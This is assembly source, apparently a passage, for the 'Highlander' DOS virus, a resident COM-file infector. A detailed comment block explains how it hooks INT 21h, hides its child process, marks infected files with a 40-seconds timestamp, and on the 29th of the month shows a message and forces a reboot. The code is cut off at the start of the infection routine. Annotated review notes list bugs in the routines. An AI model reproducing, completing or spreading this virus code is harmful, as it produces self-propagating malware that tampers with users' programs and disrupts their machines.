📄 highland.asm
;HIGHLAND.COM
;This is the HIGHLANDER Virus version 1.0.
;This virus is a generic, parasitic, resident COM infector. It will not
;infect command.com however. It is not destructive but can be irritating.
;Interrupt 21 is hooked.
;This virus is to be assembled under TASM 2.0 with the /m2 switch.
;When an infected file is executed, the virus code is executed first.
;The virus first checks to see if the virus is already resident. It does
;this by setting the AH register to 0DEh. This subfunction is currently
;unsupported by DOS. Interrupt 21 is then called. If after the call, AH is
;unchanged, the virus is not resident. If AH no longer contains 0DEh, the
;virus is assumed to be resident. (When the virus is resident its handler
;changes AH to 0EDh, but that exact value is never checked: any change away
;from 0DEh counts as "resident", so other resident software that alters AH
;on an unknown function would be mistaken for the virus and the install
;path skipped.) If the virus is already resident, the executing viral
;code will restore the host in memory to original condition and allow it
;to execute normally. If however, the virus is not resident, Interrupt 21
;will then be trapped by the virus. Once this is accomplished, the virus
;will free all available memory that it does not need (COM programs are
;allocated all available memory when they are executed even though they can
;only occupy one segment). The viral code will then copy the original
;environment and determine the path and filename of the host program in
;memory. The viral code will then shell out and re-execute the host
;program. The virus is nearly resident now. When the virus shells out
;and re-executes the host, an invalid EXEC subfunction (AL = 0FFh) is passed.
;The hooked handler interprets this to mean that installation is in
;progress and that the re-executed host must be run without infecting it;
;the handler then changes AL to the proper value (00h)
;so that the shell process will execute normally (INT 21 is already trapped
;at this point). The child process is not noticeable to the user, because it
;inherits the parent's environment, command line and FCBs. Once the host has
;finished executing, control is then returned back to the original host
;(the viral code). The virus then completes execution by going resident
;using interrupt 027h. In all appearances, the host program has just
;completed normal execution and has terminated. In actuality, the virus
;is now fully resident.
;When the virus is resident, interrupt 021h is trapped and monitored.
;When a program is executed, the resident virus gets control (DOS executes
;programs by shelling from DOS using interrupt 021h, subfunction 04bh).
;When the virus sees that a program is being executed, a series of checks
;are performed. The first thing checked for is whether or not the program
;to be executed has 'D' as the seventh letter in the filename. If it does
;the program is not infected and is allowed to execute normally (this is
;how the virus keeps from infecting COMMAND.COM. No COM file with a 'D'
;as the seventh letter will be infected). If there is no 'D' as the seventh
;letter, the virus then checks to see if the program to be executed is a
;COM file or not. If it is not a COM file, it is not infected and allowed
;to execute normally. If the COM file test is passed, the file size is then
;checked. Files are only infected if they are larger than 1024 bytes and
;smaller than 62000 bytes. If the file size is within bounds, the file
;is checked to see if it is already infected. Files are only infected
;a single time. The virus determines infection by checking the file's
;date/time stamp. If the seconds portion of the stamp is equal to 40,
;the file is assumed to be infected (this marker is also an indicator a
;scanner can look for). If the file is infected, the virus
;then checks the date. If it is the 29th day of any month, the virus will
;then display its irritating qualities by displaying the message
;'Highlander 1 RULES!' 21 times and then locking the machine and forcing
;a reboot. If the file is not infected, infection will proceed. The
;virus stores the original attributes and then changes the attributes to
;normal, read/write. The file length is also stored. The file is then
;opened and the first part of the file is read and stored in memory (the
;exact number of bytes is the same length as the virus). The virus then
;proceeds to overwrite the first part of the file with its own code. The
;file pointer is then adjusted to the end of the file and a short
;restoration routine is copied. The original first part of the file is
;then copied to the end of the file after the restore routine. The files
;time/date stamp is then adjusted to show an infection (the seconds portion
;of the time is set to 40. This normally goes unnoticed because the DIR
;command does not display seconds). The file is then
;closed and the original attributes are restored. Control is then passed
;to the original INT 021h routine and the now infected program is allowed
;to execute normally.
;This virus will infect read-only files.
;COMMAND.COM will not be infected.
;It is not destructive but can be highly irritating.
.model tiny
.code
IDEAL
;All "+0100h" terms below exist because the code is assembled at offset 0
;but a COM image is loaded at PSP:0100h; every absolute data reference is
;adjusted by hand. Any change to the size of the data area or the code
;changes endcode-begin and checkinfect-restcode, which the rest of the
;virus depends on.
begin:
jmp checkinfect ;entry of an infected file: skip the data area below
data1:
dw offset endcode+0100h ;load-time offset of the restore stub that is
;appended to the end of an infected image (restorehost reads this)
typekill:
db 01ah ;Ctrl-Z: DOS TYPE stops at this byte, so the rest of the file is
;not shown when it is TYPEd
version:
db 'v05' ;version marker (the header says 1.0; the string says v05)
data2:
dw 0,080h,0,05ch,0,06ch,0 ;EXEC (INT 21h/4Bh) parameter block: environment
;segment (0 = inherit the parent's), then three far pointers to the
;command tail (PSP:80h), FCB1 (PSP:5Ch) and FCB2 (PSP:6Ch). The segment
;words are 0 here and are filled with the PSP segment at run time by continfect.
data3:
db 'COM' ;extension compared against the name of a program being executed
;(the comparison itself is outside this listing)
data4:
db 0,0,1,0 ;byte pattern that is searched for in the environment block;
;the program's path name follows it (presumably the NUL pair that ends
;the environment strings followed by the word 1 - DOS 3+ layout; confirm)
data5:
db 'Highlander 1 RULES! $' ;payload message ('$' terminates an INT 21h/09h string)
restcode: ;restore stub. A copy of this routine is written after the virus
;body at the end of an infected file, and restorehost jumps to that copy
;with DS:SI = the saved original host bytes, ES:DI = 0100h and
;CX = size of the virus body. It must stay position-independent: it is
;executed from a different offset than it is assembled at.
rep movsb ;copy the host's original first bytes back over the virus body at
;0100h. NOTE(review): DF is never cleared on this path, so the copy
;direction is whatever the caller left in the flags.
push cs ;build CS:0100h on the stack as a "return address"
mov ax,0100h
push ax
mov ax,cx ;CX is 0 after rep movsb, so this zeroes AX
ret ;jump to 0100h, i.e. start the restored host. NOTE(review): a bare
;ret outside a FAR proc appears to assemble as a near return, which pops
;only the 0100h word; the pushed CS stays on the stack, so the host
;starts with SP two bytes lower than normal and a stray word on top
;(a host that terminates with a plain ret to PSP:0000 would jump to the
;wrong offset).
checkinfect: ;entry from begin: find out whether a copy of the virus already
;owns INT 21h
mov ax,0de00h ;AH=0DEh is not a DOS function; the resident handler (start)
;answers it by changing AH
int 21h
cmp ah,0deh ;AH still 0DEh: nobody answered, so not resident
je continfect ;go install
;NOTE(review): only "AH changed" is tested, not AH == 0EDh, so any other
;resident software that alters AH on an unknown function is taken for
;the virus and the install path is skipped.
restorehost: ;resident already: put the host back and run it
mov di,0100h ;ES:DI = where the host's original bytes belong (relies on
;ES = CS, as at COM entry)
mov si,[word data1+0100h] ;SI = offset of the restore stub copy at the end
;of the image
push cs ;push CS:stub as a "return address" (see note at ret below)
push si
add si,checkinfect-restcode ;skip the stub (its length is
;checkinfect-restcode): SI now points at the saved original host bytes
;that follow it
mov cx,endcode-begin ;byte count = size of the virus body (begin..endcode)
ret ;jump to the stub copy. NOTE(review): as a near return this pops only
;SI; the pushed CS remains on the stack (the stub leaves a second one).
;DF is not cleared here either; the stub's rep movsb inherits it.
continfect: ;not resident: hook INT 21h, shrink the memory block, re-run the
;host as a child process, then terminate-and-stay-resident.
;Entered with DS = ES = CS = PSP segment (COM entry state).
mov ax,3521h ;INT 21h/35h: get the current INT 21h vector into ES:BX
int 21h
mov [WORD int21trap+1+0100h],bx ;patch the old vector into the instruction at
;int21trap (defined after this listing) - self-modifying code
mov [WORD int21trap+3+0100h],es
mov dx,offset start+0100h ;DS:DX = new handler (start)
mov ax,2521h ;INT 21h/25h: set the INT 21h vector
int 21h ;from here on every INT 21h passes through start
mov [word data2+0100h+4],ds ;fill the segment words of the three far
mov [word data2+0100h+8],ds ;pointers in the EXEC parameter block (command
mov [word data2+0100h+12],ds ;tail, FCB1, FCB2) with this PSP segment
push ds ;ES = DS (PSP segment) for INT 21h/4Ah and 4Bh below
pop es
mov bx,offset endcode+0100h ;paragraphs to keep = (endcode+100h)/16 + 1
mov cl,04
shr bx,cl
inc bx ;+1 covers the remainder of the division
mov ah,04ah ;INT 21h/4Ah: shrink this block so the child can be loaded
int 21h ;NOTE(review): CF is not checked; a failed resize is ignored
mov ds,[word 02ch] ;DS = environment segment (PSP:2Ch)
xor si,si
cld
tryagain: ;scan the environment for the data4 pattern (0,0,1,0) that
;precedes the program's path name
mov di,offset data4+0100h ;ES:DI = pattern (ES = PSP segment)
mov cx,4
repe cmpsb ;compare 4 bytes at DS:SI against the pattern
jne tryagain ;mismatch: retry from wherever SI stopped
;NOTE(review): the scan has no bound; if the pattern is absent it runs
;through the whole 64K segment until some bytes happen to match. Also,
;the retry starts at SI after the partial compare rather than at
;start+1, so an occurrence overlapping a partial match can be skipped.
mov dx,si ;DS:DX = ASCIIZ path of this program as stored in the environment
mov bx,offset data2+0100h ;ES:BX = EXEC parameter block
mov ax,04bffh ;INT 21h/4Bh with AL=0FFh: the hooked handler (start)
;recognizes this private value, rewrites AL to 00h (load and execute)
;and does not infect the child
cld
int 21h ;run the host as a child; returns here when it exits.
;NOTE(review): no error check (CF ignored), and nothing re-establishes
;SS:SP afterwards; whether EXEC preserves them depends on the DOS
;version - confirm for the targets this is meant to run on.
mov dx,(endcode-begin)*2+0110h ;bytes to keep resident from the PSP: twice
;the virus size plus 110h (presumably room for a work buffer after
;endcode used by the infection code, which is outside this listing)
int 27h ;terminate and stay resident
start: ;INT 21h handler installed by continfect. Entered with the caller's
;registers; the labels cont and int21trap it refers to are defined after
;this listing (cont presumably restores the flags and chains to the
;original vector - not visible here).
pushf ;save the caller's flags
cmp ah,0deh ;residency probe from checkinfect?
jne check4run
mov ah,0edh ;answer the probe by changing AH (the probe only tests
;AH != 0DEh, the exact value 0EDh is never checked)
jmp cont ;chain on with the modified AH
check4run:
cmp ah,04bh ;INT 21h/4Bh EXEC is the only call the virus intercepts
je nextcheck
jmp cont ;anything else passes straight through
nextcheck:
cmp al,0ffh ;AL=0FFh is the private subfunction continfect uses to re-run
;its own host while installing
jne workvirus ;an ordinary EXEC: go infect (continues past this listing)
xor al,al ;rewrite the private value to 00h = load and execute
jmp cont ;and chain to DOS without infecting
workvirus: